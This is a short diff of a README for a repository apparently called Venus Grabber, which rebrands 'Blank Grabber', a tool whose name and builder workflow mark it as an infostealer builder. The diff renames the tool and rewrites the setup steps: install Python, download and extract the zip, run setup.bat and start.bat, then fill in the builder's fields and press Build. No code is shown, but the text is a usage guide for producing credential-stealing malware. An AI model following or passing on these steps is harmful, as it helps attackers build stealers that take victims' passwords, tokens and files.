hinmis/Venus_Grabber/README.md

 Verify the installation by executing python --version in CMD.

-Download Blank Grabber.
+Download Venus grabber.

 Extract the zip file.

-Navigate to the Blank Grabber folder and double click Builder.bat file.
+Navigate to the Venus Grabber folder and double click setup.bat file.

+After it downloads the requirement double click start.bat

 Fill in the fields of the builder and press the Build button